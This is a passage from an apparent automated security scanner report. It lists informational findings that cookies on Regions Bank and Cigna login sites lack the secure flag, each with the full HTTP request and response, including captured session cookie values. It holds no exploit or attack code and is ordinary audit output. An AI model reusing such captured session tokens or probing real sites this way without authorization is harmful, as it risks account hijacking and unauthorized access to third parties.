User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 37697

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


var gVAM_UA = navigator.userAgent.toLowerCase();
var gVAM_OS, gV
...[SNIP]...

5.54. https://securebank.regions.com/VAM/2_0_2/VAML2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAML2.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /VAM/2_0_2/VAML2.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 5007

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


function VAM_EvalDiffCond(pCO)
{
var vVal1 = pCO.ConvVal(pCO, p
...[SNIP]...

5.55. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAM_DTTB.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /VAM/2_0_2/VAM_DTTB.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 5948

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


function VAM_ReformatInit(pAO)
{
var vFld = VAM_GetById(pAO.Con
...[SNIP]...

5.56. https://securebank.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: no-cache
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Fri, 28 Sep 2007 03:41:18 GMT
Accept-Ranges: bytes
ETag: "e0921d6e811c81:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:22 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

5.57. https://securebank.regions.com/images/btnContinue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/btnContinue.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btnContinue.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R929786393; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Length: 1026
Content-Type: image/gif
Last-Modified: Mon, 19 Feb 2007 12:52:50 GMT
Accept-Ranges: bytes
ETag: "03d9adc2454c71:f627"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:09 GMT

GIF89aF......U..U.....V....g9V.U..j.$U..7W.U..9V.V........S..U..W....ET..X..6V.u.59W.V..T..8X....:W....6X...V6X.9V.......7W.^..7Y.5W....8Y....W..W..S..U..T..7X.......S..T..7V.8U.R..T..6X.Q..T..8S....S
...[SNIP]...

5.58. https://securebank.regions.com/images/equalhousing.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/equalhousing.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/equalhousing.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 282
Content-Type: image/gif
Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT
Accept-Ranges: bytes
ETag: "0b7b64b4d9c61:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT

GIF89a...........//.........kjjTr.VUU......GGG.........+Gt>>=......EQf............. B...{...........&%#`n....!.......,............'.di."..,.e...%0...,.......P0*.......    E.1.%..D.$ ....blK.
...s.%.
.#..
...[SNIP]...

5.59. https://securebank.regions.com/images/green/rf_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/green/rf_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/green/rf_logo.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 4105
Content-Type: image/gif
Last-Modified: Wed, 13 Aug 2008 19:18:20 GMT
Accept-Ranges: bytes
ETag: "0e6a25879fdc81:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:05 GMT

GIF89a).8.......U..............U.................V.....W.......r....................}.....w........u......r..........A....>...i.............}_...................{.;...~.?......^....................
...[SNIP]...

5.60. https://securebank.regions.com/images/red_arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/red_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/red_arrow.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R929786393; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Length: 54
Content-Type: image/gif
Last-Modified: Wed, 14 Feb 2007 14:50:26 GMT
Accept-Ranges: bytes
ETag: "0a53d764750c71:f627"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:09 GMT

GIF89a........U....!.......,...........a.........p..;

5.61. https://securebank.regions.com/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 799
Content-Type: image/gif
Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT
Accept-Ranges: bytes
ETag: "0b7b64b4d9c61:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT

GIF89a..................................................................................................................................................................................................
...[SNIP]...

5.62. https://securebank.regions.com/script/regions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /script/regions.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/regions.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Oct 2010 15:22:00 GMT
Accept-Ranges: bytes
ETag: "01c578a6a70cb1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:00 GMT
Content-Length: 8556

/**********************************************************
* *
* Copyright .2005 Corillian Corporation *
*
...[SNIP]...

5.63. https://securebank.regions.com/styles/styles.AmSouth.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /styles/styles.AmSouth.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/styles.AmSouth.css HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT
Accept-Ranges: bytes
ETag: "05c773bea85ca1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:00 GMT
Content-Length: 25437

BODY
{font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;}
.pageBackground
{background-image:url(../images/page_bck.gif);
...[SNIP]...

5.64. https://securebank.regions.com/styles/stylesprint.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /styles/stylesprint.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/stylesprint.css HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT
Accept-Ranges: bytes
ETag: "05c773bea85ca1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:01 GMT
Content-Length: 32493

BODY
{font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;}
.pageBackground
{background-image:url(../images/page_bck.gif);
...[SNIP]...

5.65. https://sso.corp.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=84D993307FD1107FC884A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:19 GMT
Content-length: 261
Content-type: text/html
Set-Cookie: TLTHID=8C93EE5E7FD1107FC96FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; Path=/; Domain=.cigna.com
Etag: "f2e32241-1-0-105"
Last-modified: Sun, 17 Jul 2005 20:01:07 GMT
Accept-ranges: bytes

<HTML>
<HEAD>
<META Http-Equiv="Cache-Control" Content="no-cache">
<META Http-Equiv="Pragma" Content="no-cache">
<META Http-Equiv="Expires" Content="0">
<META HTTP-EQUIV="Refresh" Content="0
...[SNIP]...

5.66. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/CIGNAforpros_logo1.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/sso/images/CIGNAforpros_logo1.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; JSESSIONID=0001mmeItkCv4WhFhPcFW-cezLI:13agknsul; TLTHID=92964B127FD1107FCAD3A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:39 GMT
Content-length: 4668
Content-type: image/gif
Set-Cookie: TLTHID=989F512A7FD1107FCBACA536181C0CE6; Path=/; Domain=.cigna.com
Etag: "62a2347d-1-0-123c"
Last-modified: Mon, 19 Jan 2004 19:08:58 GMT
Accept-ranges: bytes

GIF89a..:.......D...........y.................c..9.......................n.................r..Y...........................z..........H..xxx.........,........W........d.................z...........<...
...[SNIP]...

5.67. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/arrow_orange.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/arrow_orange.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:24 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "ef1cee75-1-0-3d"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA16587FD9107F089BA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


5.68. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/cigna_logo.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/cigna_logo.jpg HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:26 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "38eba70c-1-0-9ae"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA4F9C7FD9107F089FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


5.69. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/header_forgot_ID.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/header_forgot_ID.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:32 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "7e42fb94-3-0-48c"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4A7E0907FD9107F0896A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


5.70. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/header_forgot_password.gif

Issue detail

